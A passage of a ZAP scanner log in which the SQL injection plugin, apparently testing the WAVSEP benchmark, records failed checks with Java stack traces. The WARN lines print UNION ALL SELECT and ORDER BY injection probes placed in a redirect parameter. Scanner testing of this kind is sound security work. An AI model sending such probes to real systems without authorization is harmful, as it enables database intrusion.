NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681863 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681865 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681865 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681866 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681867 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681868 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681868 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681869 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681869 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681871 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com ORDER BY 6800#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com ORDER BY 6800# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681871 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681872 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681872 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload 